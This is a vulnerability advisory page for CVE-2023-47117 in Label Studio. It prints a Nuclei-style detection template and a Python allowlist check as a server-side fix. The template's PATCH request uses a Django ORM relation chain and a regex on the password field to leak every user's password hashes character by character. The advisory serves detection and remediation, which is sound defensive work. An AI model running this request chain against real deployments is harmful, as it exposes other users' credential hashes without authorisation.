CVE-2023-47117: Label Studio - Sensitive Information Exposure

Date: 2025-08-01 | Affected software: Label Studio | PoC: public

Vulnerability description

An attacker can construct a filter chain that filters tasks on sensitive fields of every user account on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of the query can be manipulated through the ORM filter, an attacker can leak these sensitive fields character by character.

PoC code [public]

id: CVE-2023-47117

info:
  name: Label Studio - Sensitive Information Exposure
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An attacker can construct a filter chain that filters tasks on sensitive fields of every user account on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of the query can be manipulated through the ORM filter, an attacker can leak these sensitive fields character by character.
  reference:
    - https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47117
    - https://github.com/elttam/publications
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-47117
    cwe-id: CWE-200
    epss-score: 0.65766
    epss-percentile: 0.98458
    cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: humansignal
    product: label_studio
    shodan-query: http.favicon.hash:-1649949475
  tags: cve,cve2023,label_studio,oss,exposure,authenticated

variables:
  Task_id: "{{task}}"
  Project_id: "{{project}}"

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/login/?next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on

      - |
        PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}

      - |
        GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
          - 'status_code_3==200 && status_code_4==200'
          - 'contains(header_4, "application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: csrf
        group: 1
        regex:
          - 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
        internal: true
# digest: 4b0a00483046022100f51bc2a5f1c9c5a5c7fd139da8ac2b7b8ee429d753b1c54273bcbead143e05ee0221008c6aa63f913fab676e17de1ff658cba7704373b9f15e18a12e8efb0b6752d4b0:922c64590222798bb761d5b6d8e72950
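The filter name in the PATCH body above walks a relation chain (updated_by -> active_organization -> active_users -> password) that the task view was never meant to expose. The server-side fix is to validate the column path before it reaches the ORM. The following is an added example of such a check, not Label Studio's own code: the allowed field sets and the filter-name format are assumptions for illustration, and the constructed payload mirrors the PoC request.

```python
import re

# Hypothetical allowlist of task columns a Data Manager view may filter on.
# Label Studio's real column set differs; adapt it to the deployed data model.
ALLOWED_TASK_FIELDS = {
    "id", "data", "created_at", "updated_at", "completed_at",
    "total_annotations", "cancelled_annotations", "total_predictions",
    "file_upload", "annotators",
}
# Related lookups that are explicitly permitted, as full dunder paths (assumed).
ALLOWED_RELATED_PATHS = {"annotations__completed_by"}
# Attribute names that must never appear anywhere in a filter path, as
# defence in depth should the allowlists above be widened later.
SENSITIVE_SEGMENTS = {"password", "token", "api_key", "secret", "email"}

# Filter names on the page look like "filter:tasks:<field path>".
FILTER_RE = re.compile(r"^filter:(?P<target>[a-z_]+):(?P<path>[A-Za-z0-9_]+)$")


def validate_filter_field(filter_name: str) -> tuple[bool, str]:
    """Return (accepted, reason) for one Data Manager filter column name."""
    m = FILTER_RE.match(filter_name)
    if not m:
        return False, "malformed filter name"
    if m.group("target") != "tasks":
        return False, f"unsupported target {m.group('target')!r}"
    path = m.group("path")
    segments = path.split("__")  # "__" is Django's relation/lookup separator
    if any(seg in SENSITIVE_SEGMENTS for seg in segments):
        return False, f"path touches sensitive attribute: {path}"
    if len(segments) == 1:
        if path in ALLOWED_TASK_FIELDS:
            return True, "direct task field"
        return False, f"unknown task field {path!r}"
    # Any "__" is a traversal into another model; only allowlisted paths pass.
    if path in ALLOWED_RELATED_PATHS:
        return True, "allowlisted related lookup"
    return False, f"relation traversal not allowed: {path}"


def reject_unsafe_filters(view_payload: dict) -> list[str]:
    """Collect a rejection reason for every filter item in a view PATCH body."""
    items = view_payload.get("data", {}).get("filters", {}).get("items", [])
    problems = []
    for item in items:
        ok, reason = validate_filter_field(item.get("filter", ""))
        if not ok:
            problems.append(reason)
    return problems
```

Rejecting the whole PATCH when `reject_unsafe_filters` returns anything stops the view from ever being saved with the sensitive path, so the follow-up GET /api/tasks has nothing to leak.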
